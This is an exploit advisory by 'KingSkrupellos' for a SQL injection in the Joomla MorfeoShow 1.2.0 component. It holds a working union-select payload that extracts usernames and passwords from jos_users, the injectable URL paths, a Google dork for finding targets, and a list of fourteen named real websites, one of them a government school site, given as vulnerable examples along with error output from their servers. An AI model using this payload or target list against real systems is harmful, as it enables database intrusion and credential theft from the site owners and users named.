####################################################################
# Exploit Title : Joomla MorfeoShow Components 1.2.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 31/01/2019
# Vendor Homepage : joomla4ever.org
# Software Download Link : joomla4ever.org/archive/ext/com_morfeoshow.zip
# Software Information Link : joomla4ever.org/extensions/ext-morfeoshow
# Software Version : 1.2.0
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_morfeoshow''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description about Software :
***************************
MorfeoShow - Photo Gallery for Joomla 1.5 + plugin to insert photos in the site's content!
####################################################################
# Impact :
***********
* An attacker might be able inject and/or alter existing
SQL statements which would influence the database exchange.
* SQL injection vulnerability in the Joomla MorfeoShow Components 1.2.0 because,
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
* On the other hand, this component MorfeoShow for Joomla! allows
remote attackers to execute arbitrary SQL commands
via the " Itemid=, gallery=, idm= "
with different parameters action to index.php.
* Exploiting this issue could allow an attacker to compromise the application, read,
access or modify data, or exploit latent vulnerabilities in the underlying database.
If the webserver is misconfigured, read & write access to the filesystem may be possible.
####################################################################
# SQL Injection Exploit :
**********************
/index.php?option=com_morfeoshow&Itemid=[SQL Injection]
/index.php?option=com_morfeoshow&task=view&gallery=[SQL Injection]
/index.php?option=com_morfeoshow&task=view&gallery=[ID-NUMBER]&Itemid=[SQL Injection]
/index.php?option=com_morfeoshow&task=view&gallery=[ID-NUMBER]&Itemid=[ID-NUMBER]&Itemid=[ID-NUMBER]&idm=[SQL Injection]
# SQL Injection Exploit Payload :
*****************************
+and+1=0+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+
####################################################################
# Example Vulnerable Sites :
*************************
[+] iccrucoli.gov.it/old/index.php?option=com_morfeoshow&Itemid=8%27
[+] scuolaprimolevi.it/index.php?option=com_morfeoshow&task=view&gallery=2&Itemid=7%27
[+] elsemillero.net/nuevo/index.php?option=com_morfeoshow&Itemid=163%27
[+] thecountrychurch.com/index.php?option=com_morfeoshow&task=view&gallery=9%27
[+] funlec.com.br/biblioteca/index.php?option=com_morfeoshow&task=view&gallery=12&Itemid=199%27
[+] eolopress.it/eolo/index.php?option=com_morfeoshow&task=view&gallery=16&Itemid=258%27
[+] tarnafjallens.se/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=63%27
[+] cworksmobile.com/clab/index.php?option=com_morfeoshow&task=view&gallery=8%27
[+] zetech.pl/joomla/index.php?option=com_morfeoshow&task=view&gallery=2&Itemid=38%27
[+] floradoceara.com.br/index.php?option=com_morfeoshow&task=view&gallery=5&Itemid=13%27
[+] danilson.com.br/index.php?option=com_morfeoshow&task=view&gallery=2&Itemid=105%27
[+] 2010nw.co.za/index.php?option=com_morfeoshow&task=view&gallery=1%27
[+] eltoritosantandereano.com/index.php?option=com_morfeoshow&Itemid=66%27
[+] uspr.fr/index.php?option=com_morfeoshow&Itemid=63%27
####################################################################
# Example SQL Database Error :
****************************
Message: Invalid controller specified (index.php) at line 242 in
/var/www/novamelodica.nl/lib/Zend/Controller/Dispatcher/Standard.php
Strict Standards: Non-static method JLoader::import() should not be
called statically in /home/elsemillero/public_html
/nuevo/libraries/joomla/import.php on line 29
Strict Standards: Non-static method JApplication::getTemplate() should not be
called statically in /home/primolevi/domains/scuolaprimolevi.it/public_html
/libraries/joomla/application/helper.php on line 195 Strict Standards:
Only variables should be assigned by reference in /home/primolevi/domains
/scuolaprimolevi.it/public_html/components/com_morfeoshow
/morfeoshow.php on line 22
jos-Warning: Error loading component: com_morfeoshow, 1
JSite -> dispatch() @ /home/country/public_html/index.php:42
JComponentHelper :: renderComponent() @
/home/country/public_html/includes/application.php:194
Fatal error: Uncaught exception 'RuntimeException' with message
'Unknown column 'header' in 'field list' SQL=SELECT `new_url`,`header`,
`published` FROM `edlpm_redirect_links` WHERE `old_url` =
'http://www.uspr.fr/index.php?option=com_morfeoshow&Itemid=63'
LIMIT 0, 1' in /homepages/37/d176518689/htdocs/libraries/joomla
/database/driver/mysql.php:332 Stack trace: #0 /homepages/37/d176518689
/htdocs/libraries/joomla/database/driver.php(1239): JDatabaseDriverMysql->
execute() #1 /homepages/37/d176518689/htdocs/plugins/system/redirect
/redirect.php(86): JDatabaseDriver->loadObject() #2 [internal function]:
PlgSystemRedirect::handleError(Object(Exception)) #3 {main} thrown
in /homepages/37/d176518689/htdocs/libraries
/joomla/database/driver/mysql.php on line 332
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################